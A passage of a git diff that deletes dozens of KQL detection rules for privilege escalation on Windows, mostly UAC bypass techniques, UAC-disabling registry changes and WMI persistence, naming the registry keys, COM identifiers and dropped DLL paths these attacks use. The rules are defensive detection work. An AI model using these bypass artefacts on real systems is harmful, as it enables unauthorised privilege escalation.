-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceProcessEvents
-| where ProcessCommandLine endswith "\"\\system32\\cleanmgr.exe /autoclean /d C:" and (ProcessIntegrityLevel in~ ("High", "System")) and InitiatingProcessCommandLine =~ "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule"
\ No newline at end of file
diff --git a/Privilege Escalation/UAC_Bypass_Using_DismHost.kql b/Privilege Escalation/UAC_Bypass_Using_DismHost.kql
deleted file mode 100644
index 63f130be..00000000
--- a/Privilege Escalation/UAC_Bypass_Using_DismHost.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/30
-// Level: high
-// Description: Detects the pattern of UAC Bypass using DismHost DLL hijacking (UACMe 63)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceProcessEvents
-| where (ProcessIntegrityLevel in~ ("High", "System")) and (InitiatingProcessFolderPath contains "C:\\Users\\" and InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\" and InitiatingProcessFolderPath contains "\\DismHost.exe")
\ No newline at end of file
diff --git a/Privilege Escalation/UAC_Bypass_Using_EventVwr.kql b/Privilege Escalation/UAC_Bypass_Using_EventVwr.kql
deleted file mode 100644
index 3043fd99..00000000
--- a/Privilege Escalation/UAC_Bypass_Using_EventVwr.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Antonio Cocomazzi (idea), Florian Roth (Nextron Systems)
-// Date: 2022/04/27
-// Level: high
-// Description: Detects the pattern of a UAC bypass using Windows Event Viewer
-// Tags: attack.defense_evasion, attack.privilege_escalation
-DeviceFileEvents
-| where (FolderPath endswith "\\Microsoft\\Event Viewer\\RecentViews" or FolderPath endswith "\\Microsoft\\EventV~1\\RecentViews") and (not((InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\")))
\ No newline at end of file
diff --git a/Privilege Escalation/UAC_Bypass_Using_Event_Viewer_RecentViews.kql b/Privilege Escalation/UAC_Bypass_Using_Event_Viewer_RecentViews.kql
deleted file mode 100644
index 974b22fe..00000000
--- a/Privilege Escalation/UAC_Bypass_Using_Event_Viewer_RecentViews.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/11/22
-// Level: high
-// Description: Detects the pattern of UAC Bypass using Event Viewer RecentViews
-// Tags: attack.defense_evasion, attack.privilege_escalation
-DeviceProcessEvents
-| where (ProcessCommandLine contains "\\Event Viewer\\RecentViews" or ProcessCommandLine contains "\\EventV~1\\RecentViews") and ProcessCommandLine contains ">"
\ No newline at end of file
diff --git a/Privilege Escalation/UAC_Bypass_Using_IDiagnostic_Profile.kql b/Privilege Escalation/UAC_Bypass_Using_IDiagnostic_Profile.kql
deleted file mode 100644
index 26df3a86..00000000
--- a/Privilege Escalation/UAC_Bypass_Using_IDiagnostic_Profile.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/03
-// Level: high
-// Description: Detects the "IDiagnosticProfileUAC" UAC bypass technique
-// Tags: attack.execution, attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceProcessEvents
-| where (ProcessIntegrityLevel in~ ("High", "System")) and InitiatingProcessCommandLine contains " /Processid:{12C21EA7-2EB8-4B55-9249-AC243DA8C666}" and InitiatingProcessFolderPath endswith "\\DllHost.exe"
\ No newline at end of file
diff --git a/Privilege Escalation/UAC_Bypass_Using_IDiagnostic_Profile_-_File.kql b/Privilege Escalation/UAC_Bypass_Using_IDiagnostic_Profile_-_File.kql
deleted file mode 100644
index 25b12cc5..00000000
--- a/Privilege Escalation/UAC_Bypass_Using_IDiagnostic_Profile_-_File.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/03
-// Level: high
-// Description: Detects the creation of a file by "dllhost.exe" in System32 directory part of "IDiagnosticProfileUAC" UAC bypass technique
-// Tags: attack.execution, attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceFileEvents
-| where InitiatingProcessFolderPath endswith "\\DllHost.exe" and FolderPath endswith ".dll" and FolderPath startswith "C:\\Windows\\System32\\"
\ No newline at end of file
diff --git a/Privilege Escalation/UAC_Bypass_Using_IEInstal_-_File.kql b/Privilege Escalation/UAC_Bypass_Using_IEInstal_-_File.kql
deleted file mode 100644
index 1ca85fad..00000000
--- a/Privilege Escalation/UAC_Bypass_Using_IEInstal_-_File.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/30
-// Level: high
-// Description: Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceFileEvents
-| where InitiatingProcessFolderPath =~ "C:\\Program Files\\Internet Explorer\\IEInstal.exe" and FolderPath contains "\\AppData\\Local\\Temp\\" and FolderPath endswith "consent.exe" and FolderPath startswith "C:\\Users\\"
\ No newline at end of file
diff --git a/Privilege Escalation/UAC_Bypass_Using_IEInstal_-_Process.kql b/Privilege Escalation/UAC_Bypass_Using_IEInstal_-_Process.kql
deleted file mode 100644
index eaf21560..00000000
--- a/Privilege Escalation/UAC_Bypass_Using_IEInstal_-_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/30
-// Level: high
-// Description: Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceProcessEvents
-| where FolderPath contains "\\AppData\\Local\\Temp\\" and FolderPath endswith "consent.exe" and (ProcessIntegrityLevel in~ ("High", "System")) and InitiatingProcessFolderPath endswith "\\ieinstal.exe"
\ No newline at end of file
diff --git a/Privilege Escalation/UAC_Bypass_Using_Iscsicpl_-_ImageLoad.kql b/Privilege Escalation/UAC_Bypass_Using_Iscsicpl_-_ImageLoad.kql
deleted file mode 100644
index 7d63fa2a..00000000
--- a/Privilege Escalation/UAC_Bypass_Using_Iscsicpl_-_ImageLoad.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/17
-// Level: high
-// Description: Detects the "iscsicpl.exe" UAC bypass technique that leverages a DLL Search Order hijacking technique to load a custom DLL's from temp or a any user controlled location in the users %PATH%
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceImageLoadEvents
-| where (InitiatingProcessFolderPath =~ "C:\\Windows\\SysWOW64\\iscsicpl.exe" and FolderPath endswith "\\iscsiexe.dll") and (not((FolderPath contains "C:\\Windows\\" and FolderPath contains "iscsiexe.dll")))
\ No newline at end of file
diff --git a/Privilege Escalation/UAC_Bypass_Using_MSConfig_Token_Modification_-_File.kql b/Privilege Escalation/UAC_Bypass_Using_MSConfig_Token_Modification_-_File.kql
deleted file mode 100644
index cadc4f08..00000000
--- a/Privilege Escalation/UAC_Bypass_Using_MSConfig_Token_Modification_-_File.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/30
-// Level: high
-// Description: Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceFileEvents
-| where FolderPath endswith "\\AppData\\Local\\Temp\\pkgmgr.exe" and FolderPath startswith "C:\\Users\\"
\ No newline at end of file
diff --git a/Privilege Escalation/UAC_Bypass_Using_MSConfig_Token_Modification_-_Process.kql b/Privilege Escalation/UAC_Bypass_Using_MSConfig_Token_Modification_-_Process.kql
deleted file mode 100644
index ebc4f60d..00000000
--- a/Privilege Escalation/UAC_Bypass_Using_MSConfig_Token_Modification_-_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/30
-// Level: high
-// Description: Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceProcessEvents
-| where ProcessCommandLine =~ "\"C:\\Windows\\system32\\msconfig.exe\" -5" and (ProcessIntegrityLevel in~ ("High", "System")) and InitiatingProcessFolderPath endswith "\\AppData\\Local\\Temp\\pkgmgr.exe"
\ No newline at end of file
diff --git a/Privilege Escalation/UAC_Bypass_Using_NTFS_Reparse_Point_-_File.kql b/Privilege Escalation/UAC_Bypass_Using_NTFS_Reparse_Point_-_File.kql
deleted file mode 100644
index 79b84858..00000000
--- a/Privilege Escalation/UAC_Bypass_Using_NTFS_Reparse_Point_-_File.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/30
-// Level: high
-// Description: Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceFileEvents
-| where FolderPath endswith "\\AppData\\Local\\Temp\\api-ms-win-core-kernel32-legacy-l1.DLL" and FolderPath startswith "C:\\Users\\"
\ No newline at end of file
diff --git a/Privilege Escalation/UAC_Bypass_Using_NTFS_Reparse_Point_-_Process.kql b/Privilege Escalation/UAC_Bypass_Using_NTFS_Reparse_Point_-_Process.kql
deleted file mode 100644
index a2dfe81e..00000000
--- a/Privilege Escalation/UAC_Bypass_Using_NTFS_Reparse_Point_-_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/30
-// Level: high
-// Description: Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceProcessEvents
-| where (ProcessCommandLine endswith "\\AppData\\Local\\Temp\\update.msu" and ProcessCommandLine startswith "\"C:\\Windows\\system32\\wusa.exe\" /quiet C:\\Users\\" and (ProcessIntegrityLevel in~ ("High", "System"))) or ((ProcessCommandLine contains "C:\\Users\\" and ProcessCommandLine contains "\\AppData\\Local\\Temp\\" and ProcessCommandLine contains "\\dismhost.exe {") and FolderPath endswith "\\DismHost.exe" and (ProcessIntegrityLevel in~ ("High", "System")) and InitiatingProcessCommandLine =~ "\"C:\\Windows\\system32\\dism.exe\" /online /quiet /norestart /add-package /packagepath:\"C:\\Windows\\system32\\pe386\" /ignorecheck")
\ No newline at end of file
diff --git a/Privilege Escalation/UAC_Bypass_Using_PkgMgr_and_DISM.kql b/Privilege Escalation/UAC_Bypass_Using_PkgMgr_and_DISM.kql
deleted file mode 100644
index 594500b1..00000000
--- a/Privilege Escalation/UAC_Bypass_Using_PkgMgr_and_DISM.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/23
-// Level: high
-// Description: Detects the pattern of UAC Bypass using pkgmgr.exe and dism.exe (UACMe 23)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceProcessEvents
-| where FolderPath endswith "\\dism.exe" and (ProcessIntegrityLevel in~ ("High", "System")) and InitiatingProcessFolderPath endswith "\\pkgmgr.exe"
\ No newline at end of file
diff --git a/Privilege Escalation/UAC_Bypass_Using_Windows_Media_Player_-_File.kql b/Privilege Escalation/UAC_Bypass_Using_Windows_Media_Player_-_File.kql
deleted file mode 100644
index ef7a7239..00000000
--- a/Privilege Escalation/UAC_Bypass_Using_Windows_Media_Player_-_File.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/23
-// Level: high
-// Description: Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceFileEvents
-| where (FolderPath endswith "\\AppData\\Local\\Temp\\OskSupport.dll" and FolderPath startswith "C:\\Users\\") or (InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\DllHost.exe" and FolderPath =~ "C:\\Program Files\\Windows Media Player\\osk.exe")
\ No newline at end of file
diff --git a/Privilege Escalation/UAC_Bypass_Using_Windows_Media_Player_-_Process.kql b/Privilege Escalation/UAC_Bypass_Using_Windows_Media_Player_-_Process.kql
deleted file mode 100644
index 96f8c1bd..00000000
--- a/Privilege Escalation/UAC_Bypass_Using_Windows_Media_Player_-_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/23
-// Level: high
-// Description: Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceProcessEvents
-| where (FolderPath =~ "C:\\Program Files\\Windows Media Player\\osk.exe" and (ProcessIntegrityLevel in~ ("High", "System"))) or (FolderPath =~ "C:\\Windows\\System32\\cmd.exe" and (ProcessIntegrityLevel in~ ("High", "System")) and InitiatingProcessCommandLine =~ "\"C:\\Windows\\system32\\mmc.exe\" \"C:\\Windows\\system32\\eventvwr.msc\" /s")
\ No newline at end of file
diff --git a/Privilege Escalation/UAC_Bypass_Using_Windows_Media_Player_-_Registry.kql b/Privilege Escalation/UAC_Bypass_Using_Windows_Media_Player_-_Registry.kql
deleted file mode 100644
index dc52850a..00000000
--- a/Privilege Escalation/UAC_Bypass_Using_Windows_Media_Player_-_Registry.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/23
-// Level: high
-// Description: Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceRegistryEvents
-| where RegistryValueData =~ "Binary Data" and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\Compatibility Assistant\\Store\\C:\\Program Files\\Windows Media Player\\osk.exe"
\ No newline at end of file
diff --git a/Privilege Escalation/UAC_Bypass_Via_Wsreset.kql b/Privilege Escalation/UAC_Bypass_Via_Wsreset.kql
deleted file mode 100644
index 7ddbf642..00000000
--- a/Privilege Escalation/UAC_Bypass_Via_Wsreset.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: oscd.community, Dmitry Uchakin
-// Date: 2020/10/07
-// Level: high
-// Description: Unfixed method for UAC bypass from Windows 10. WSReset.exe file associated with the Windows Store. It will run a binary file contained in a low-privilege registry.
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceRegistryEvents
-| where RegistryKey endswith "\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\Shell\\open\\command"
\ No newline at end of file
diff --git a/Privilege Escalation/UAC_Bypass_WSReset.kql b/Privilege Escalation/UAC_Bypass_WSReset.kql
deleted file mode 100644
index b39549cb..00000000
--- a/Privilege Escalation/UAC_Bypass_WSReset.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/23
-// Level: high
-// Description: Detects the pattern of UAC Bypass via WSReset usable by default sysmon-config
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceProcessEvents
-| where FolderPath endswith "\\wsreset.exe" and (ProcessIntegrityLevel in~ ("High", "System"))
\ No newline at end of file
diff --git a/Privilege Escalation/UAC_Bypass_With_Fake_DLL.kql b/Privilege Escalation/UAC_Bypass_With_Fake_DLL.kql
deleted file mode 100644
index ea6ebd96..00000000
--- a/Privilege Escalation/UAC_Bypass_With_Fake_DLL.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: oscd.community, Dmitry Uchakin
-// Date: 2020/10/06
-// Level: high
-// Description: Attempts to load dismcore.dll after dropping it
-// Tags: attack.persistence, attack.defense_evasion, attack.privilege_escalation, attack.t1548.002, attack.t1574.002
-DeviceImageLoadEvents
-| where (FolderPath endswith "\\dismcore.dll" and InitiatingProcessFolderPath endswith "\\dism.exe") and (not(FolderPath =~ "C:\\Windows\\System32\\Dism\\dismcore.dll"))
\ No newline at end of file
diff --git a/Privilege Escalation/UAC_Bypass_via_Event_Viewer.kql b/Privilege Escalation/UAC_Bypass_via_Event_Viewer.kql
deleted file mode 100644
index c13ab477..00000000
--- a/Privilege Escalation/UAC_Bypass_via_Event_Viewer.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2017/03/19
-// Level: high
-// Description: Detects UAC bypass method using Windows event viewer
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002, car.2019-04-001
-DeviceRegistryEvents
-| where RegistryKey endswith "\\mscfile\\shell\\open\\command"
\ No newline at end of file
diff --git a/Privilege Escalation/UAC_Bypass_via_ICMLuaUtil.kql b/Privilege Escalation/UAC_Bypass_via_ICMLuaUtil.kql
deleted file mode 100644
index e6a2379f..00000000
--- a/Privilege Escalation/UAC_Bypass_via_ICMLuaUtil.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Elastic (idea)
-// Date: 2022/09/13
-// Level: high
-// Description: Detects the pattern of UAC Bypass using ICMLuaUtil Elevated COM interface
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceProcessEvents
-| where ((InitiatingProcessCommandLine contains "/Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}" or InitiatingProcessCommandLine contains "/Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}") and InitiatingProcessFolderPath endswith "\\dllhost.exe") and (not((FolderPath endswith "\\WerFault.exe" or ProcessVersionInfoOriginalFileName =~ "WerFault.exe")))
\ No newline at end of file
diff --git a/Privilege Escalation/UAC_Bypass_via_Sdclt.kql b/Privilege Escalation/UAC_Bypass_via_Sdclt.kql
deleted file mode 100644
index 62170641..00000000
--- a/Privilege Escalation/UAC_Bypass_via_Sdclt.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Omer Yampel, Christian Burkard (Nextron Systems)
-// Date: 2017/03/17
-// Level: high
-// Description: Detects the pattern of UAC Bypass using registry key manipulation of sdclt.exe (e.g. UACMe 53)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002, car.2019-04-001
-DeviceRegistryEvents
-| where RegistryKey endswith "Software\\Classes\\exefile\\shell\\runas\\command\\isolatedCommand" or (RegistryValueData matches regex "-1[0-9]{3}\\\\Software\\\\Classes\\\\" and RegistryKey endswith "Software\\Classes\\Folder\\shell\\open\\command\\SymbolicLinkValue")
\ No newline at end of file
diff --git a/Privilege Escalation/UAC_Bypass_via_Windows_Firewall_Snap-In_Hijack.kql b/Privilege Escalation/UAC_Bypass_via_Windows_Firewall_Snap-In_Hijack.kql
deleted file mode 100644
index dce3946b..00000000
--- a/Privilege Escalation/UAC_Bypass_via_Windows_Firewall_Snap-In_Hijack.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Tim Rauch, Elastic (idea)
-// Date: 2022/09/27
-// Level: medium
-// Description: Detects attempts to bypass User Account Control (UAC) by hijacking the Microsoft Management Console (MMC) Windows Firewall snap-in
-// Tags: attack.privilege_escalation, attack.t1548
-DeviceProcessEvents
-| where (InitiatingProcessCommandLine contains "WF.msc" and InitiatingProcessFolderPath endswith "\\mmc.exe") and (not(FolderPath endswith "\\WerFault.exe"))
\ No newline at end of file
diff --git a/Privilege Escalation/UAC_Disabled.kql b/Privilege Escalation/UAC_Disabled.kql
deleted file mode 100644
index 0ee19c33..00000000
--- a/Privilege Escalation/UAC_Disabled.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: frack113
-// Date: 2022/01/05
-// Level: medium
-// Description: Detects when an attacker tries to disable User Account Control (UAC) by setting the registry value "EnableLUA" to 0.
-
-// Tags: attack.privilege_escalation, attack.defense_evasion, attack.t1548.002
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\EnableLUA"
\ No newline at end of file
diff --git a/Privilege Escalation/UAC_Notification_Disabled.kql b/Privilege Escalation/UAC_Notification_Disabled.kql
deleted file mode 100644
index 0c9d6980..00000000
--- a/Privilege Escalation/UAC_Notification_Disabled.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2024/05/10
-// Level: medium
-// Description: Detects when an attacker tries to disable User Account Control (UAC) notification by tampering with the "UACDisableNotify" value.
-UAC is a critical security feature in Windows that prevents unauthorized changes to the operating system. It prompts the user for permission or an administrator password before allowing actions that could affect the system's operation or change settings that affect other users.
-When "UACDisableNotify" is set to 1, UAC prompts are suppressed.
-
-// Tags: attack.privilege_escalation, attack.defense_evasion, attack.t1548.002
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey contains "\\Microsoft\\Security Center\\UACDisableNotify"
\ No newline at end of file
diff --git a/Privilege Escalation/UAC_Secure_Desktop_Prompt_Disabled.kql b/Privilege Escalation/UAC_Secure_Desktop_Prompt_Disabled.kql
deleted file mode 100644
index 684fe543..00000000
--- a/Privilege Escalation/UAC_Secure_Desktop_Prompt_Disabled.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: frack113
-// Date: 2024/05/10
-// Level: medium
-// Description: Detects when an attacker tries to change User Account Control (UAC) elevation request destination via the "PromptOnSecureDesktop" value.
-The "PromptOnSecureDesktop" setting specifically determines whether UAC prompts are displayed on the secure desktop. The secure desktop is a separate desktop environment that's isolated from other processes running on the system. It's designed to prevent malicious software from intercepting or tampering with UAC prompts.
-When "PromptOnSecureDesktop" is set to 0, UAC prompts are displayed on the user's current desktop instead of the secure desktop. This reduces the level of security because it potentially exposes the prompts to manipulation by malicious software.
-
-// Tags: attack.privilege_escalation, attack.defense_evasion, attack.t1548.002
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\PromptOnSecureDesktop"
\ No newline at end of file
diff --git a/Privilege Escalation/Uncommon_Extension_Shim_Database_Installation_Via_Sdbinst.EXE.kql b/Privilege Escalation/Uncommon_Extension_Shim_Database_Installation_Via_Sdbinst.EXE.kql
deleted file mode 100644
index 6f462ae1..00000000
--- a/Privilege Escalation/Uncommon_Extension_Shim_Database_Installation_Via_Sdbinst.EXE.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/08/01
-// Level: medium
-// Description: Detects installation of a potentially suspicious new shim with an uncommon extension using sdbinst.exe.
-Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims
-
-// Tags: attack.persistence, attack.privilege_escalation, attack.t1546.011
-DeviceProcessEvents
-| where (FolderPath endswith "\\sdbinst.exe" or ProcessVersionInfoOriginalFileName =~ "sdbinst.exe") and (not((ProcessCommandLine =~ "" or ProcessCommandLine contains ".sdb" or isnull(ProcessCommandLine) or ((ProcessCommandLine endswith " -c" or ProcessCommandLine endswith " -f" or ProcessCommandLine endswith " -mm" or ProcessCommandLine endswith " -t") or ProcessCommandLine contains " -m -bg"))))
\ No newline at end of file
diff --git a/Privilege Escalation/Uncommon_One_Time_Only_Scheduled_Task_At_00_00.kql b/Privilege Escalation/Uncommon_One_Time_Only_Scheduled_Task_At_00_00.kql
deleted file mode 100644
index 63e818d3..00000000
--- a/Privilege Escalation/Uncommon_One_Time_Only_Scheduled_Task_At_00_00.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: pH-T (Nextron Systems)
-// Date: 2022/07/15
-// Level: high
-// Description: Detects scheduled task creation events that include suspicious actions, and is run once at 00:00
-// Tags: attack.execution, attack.persistence, attack.privilege_escalation, attack.t1053.005
-DeviceProcessEvents
-| where (ProcessCommandLine contains "wscript" or ProcessCommandLine contains "vbscript" or ProcessCommandLine contains "cscript" or ProcessCommandLine contains "wmic " or ProcessCommandLine contains "wmic.exe" or ProcessCommandLine contains "regsvr32.exe" or ProcessCommandLine contains "powershell" or ProcessCommandLine contains "\\AppData\\") and (FolderPath contains "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe") and (ProcessCommandLine contains "once" and ProcessCommandLine contains "00:00")
\ No newline at end of file
diff --git a/Privilege Escalation/VsCode_Powershell_Profile_Modification.kql b/Privilege Escalation/VsCode_Powershell_Profile_Modification.kql
deleted file mode 100644
index 6d500082..00000000
--- a/Privilege Escalation/VsCode_Powershell_Profile_Modification.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/24
-// Level: medium
-// Description: Detects the creation or modification of a vscode related powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence
-// Tags: attack.persistence, attack.privilege_escalation, attack.t1546.013
-DeviceFileEvents
-| where FolderPath endswith "\\Microsoft.VSCode_profile.ps1"
\ No newline at end of file
diff --git a/Privilege Escalation/WMI_ActiveScriptEventConsumers_Activity_Via_Scrcons.EXE_DLL_Load.kql b/Privilege Escalation/WMI_ActiveScriptEventConsumers_Activity_Via_Scrcons.EXE_DLL_Load.kql
deleted file mode 100644
index 3f40bc3a..00000000
--- a/Privilege Escalation/WMI_ActiveScriptEventConsumers_Activity_Via_Scrcons.EXE_DLL_Load.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
-// Date: 2020/09/02
-// Level: medium
-// Description: Detects signs of the WMI script host process "scrcons.exe" loading scripting DLLs which could indicates WMI ActiveScriptEventConsumers EventConsumers activity.
-// Tags: attack.lateral_movement, attack.privilege_escalation, attack.persistence, attack.t1546.003
-DeviceImageLoadEvents
-| where (FolderPath endswith "\\vbscript.dll" or FolderPath endswith "\\wbemdisp.dll" or FolderPath endswith "\\wshom.ocx" or FolderPath endswith "\\scrrun.dll") and InitiatingProcessFolderPath endswith "\\scrcons.exe"
\ No newline at end of file
diff --git a/Privilege Escalation/WMI_Persistence_-_Script_Event_Consumer.kql b/Privilege Escalation/WMI_Persistence_-_Script_Event_Consumer.kql
deleted file mode 100644
index 36c7415d..00000000
--- a/Privilege Escalation/WMI_Persistence_-_Script_Event_Consumer.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Thomas Patzke
-// Date: 2018/03/07
-// Level: medium
-// Description: Detects WMI script event consumers
-// Tags: attack.persistence, attack.privilege_escalation, attack.t1546.003
-DeviceProcessEvents
-| where FolderPath =~ "C:\\WINDOWS\\system32\\wbem\\scrcons.exe" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\svchost.exe"
\ No newline at end of file
diff --git a/Privilege Escalation/Whoami.EXE_Execution_From_Privileged_Process.kql b/Privilege Escalation/Whoami.EXE_Execution_From_Privileged_Process.kql
deleted file mode 100644
index 35ff8ce9..00000000
--- a/Privilege Escalation/Whoami.EXE_Execution_From_Privileged_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Teymur Kheirkhabarov
-// Date: 2022/01/28
-// Level: high
-// Description: Detects the execution of "whoami.exe" by privileged accounts that are often abused by threat actors
-// Tags: attack.privilege_escalation, attack.discovery, attack.t1033
-DeviceProcessEvents
-| where (ProcessVersionInfoOriginalFileName =~ "whoami.exe" or FolderPath endswith "\\whoami.exe") and (AccountName contains "AUTHORI" or AccountName contains "AUTORI" or AccountName contains "TrustedInstaller")
\ No newline at end of file
diff --git a/Privilege Escalation/Windows_Kernel_Debugger_Execution.kql b/Privilege Escalation/Windows_Kernel_Debugger_Execution.kql
deleted file mode 100644
index 1742c500..00000000
--- a/Privilege Escalation/Windows_Kernel_Debugger_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/15
-// Level: medium
-// Description: Detects execution of the Windows Kernel Debugger "kd.exe".
-// Tags: attack.defense_evasion, attack.privilege_escalation
-DeviceProcessEvents
-| where FolderPath endswith "\\kd.exe" or ProcessVersionInfoOriginalFileName =~ "kd.exe"
\ No newline at end of file
diff --git a/Privilege Escalation/Windows_Spooler_Service_Suspicious_Binary_Load.kql b/Privilege Escalation/Windows_Spooler_Service_Suspicious_Binary_Load.kql
deleted file mode 100644
index e0568272..00000000
--- a/Privilege Escalation/Windows_Spooler_Service_Suspicious_Binary_Load.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: FPT.EagleEye, Thomas Patzke (improvements)
-// Date: 2021/06/29
-// Level: informational
-// Description: Detect DLL Load from Spooler Service backup folder
-// Tags: attack.persistence, attack.defense_evasion, attack.privilege_escalation, attack.t1574, cve.2021.1675, cve.2021.34527
-DeviceImageLoadEvents
-| where (FolderPath contains "\\Windows\\System32\\spool\\drivers\\x64\\3\\" or FolderPath contains "\\Windows\\System32\\spool\\drivers\\x64\\4\\") and FolderPath endswith ".dll" and InitiatingProcessFolderPath endswith "\\spoolsv.exe"
\ No newline at end of file
diff --git a/README.md b/README.md
index 0cfa7def..17de79dc 100644
--- a/README.md
+++ b/README.md
